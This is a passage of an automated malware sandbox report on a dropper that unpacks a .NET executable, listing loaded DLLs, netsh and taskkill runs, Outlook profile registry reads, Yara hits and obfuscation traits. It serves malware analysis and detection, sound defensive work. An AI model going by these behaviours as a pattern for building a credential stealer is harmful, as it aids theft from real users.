                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: windowscodecs.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\SysWOW64\cmd.exe  Section loaded: cmdext.dll
                          Source: C:\Windows\SysWOW64\openfiles.exe  Section loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\openfiles.exe  Section loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\openfiles.exe  Section loaded: version.dll
                          Source: C:\Windows\SysWOW64\openfiles.exe  Section loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\openfiles.exe  Section loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: LKxcbzlwkz.exeStatic file information: File size 5015009 > 1048576
                          Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015451084.000001BB37DC0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: winload_prod.pdb source: Temp.txt.1.dr
                          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed|||Newtonsoft.Json.Bson.pdb|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F|26968 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: ntkrnlmp.pdb source: Temp.txt.1.dr
                          Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA2567 source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015451084.000001BB37DC0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.1.dr
                          Source: Binary string: costura.costura.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressedl)=Eo source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.wpf.ui.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: !costura.polly.core.pdb.compressed source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.wpf.ui.pdb.compressed|||Wpf.Ui.pdb|299223DFCADFE8FD464F218CE110C10266AB22B0|139288 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: winload_prod.pdb\ source: Temp.txt.1.dr
                          Source: Binary string: costura.polly.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdb source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdbSHA256 source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.polly.pdb.compressed|||Polly.pdb|6E4429D15FBCD96C44E391E109CB500EC2508333|83400 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.polly.core.pdb.compressed|||Polly.Core.pdb|C1D3F2BA348EA2F6635B8F5961AD127E831487C6|66148 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed|||ICSharpCode.SharpZipLib.pdb|E1FCA83029D1440F54FB3747B240365A6DF0A598|121652 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.polly.core.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr

                          Data Obfuscation

                          Source: JOUNLV.exe.0.dr, AssemblyLoader.cs | .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                          Source: aut66E4.tmp.0.dr, AssemblyLoader.cs | .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                          Source: 1.2.JOUNLV.exe.1bb50b90000.9.raw.unpack, DynamicUtils.cs | .Net Code: CreateSharpArgumentInfoArray
                          Source: 1.2.JOUNLV.exe.1bb50b90000.9.raw.unpack, LateBoundReflectionDelegateFactory.cs | .Net Code: CreateDefaultConstructor
                          Source: 1.2.JOUNLV.exe.1bb4808b090.5.raw.unpack, DynamicUtils.cs | .Net Code: CreateSharpArgumentInfoArray
                          Source: 1.2.JOUNLV.exe.1bb4808b090.5.raw.unpack, LateBoundReflectionDelegateFactory.cs | .Net Code: CreateDefaultConstructor
                          Source: 1.2.JOUNLV.exe.1bb50ae0000.8.raw.unpack, ReflectionMemberAccessor.cs | .Net Code: CreateParameterlessConstructor
                          Source: Yara match | File source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR
                          Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPED
                          Source: JOUNLV.exe.0.dr | Static PE information: 0xEBE8C2F3 [Fri Jun 3 00:40:19 2095 UTC]
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
                          Source: aut66E4.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x397cbc
                          Source: LKxcbzlwkz.exe | Static PE information: real checksum: 0xa961f should be: 0x4cb254
                          Source: JOUNLV.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x397cbc
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00462463 push edi; ret 0_2_00462465
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B887860 push eax; iretd 1_2_00007FFD9B88786D
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B894243 push edi; retf 1_2_00007FFD9B894316
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8B8138 push ebx; ret 1_2_00007FFD9B8B816A
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B894159 push edi; retf 1_2_00007FFD9B894316
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9BA95904 push eax; retf 5F2Dh 1_2_00007FFD9BA95ADD
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9BA91B73 push edi; iretd 1_2_00007FFD9BA91B76
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | File created: C:\Users\user\AppData\Local\Temp\aut66E4.tmp
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | File created: C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
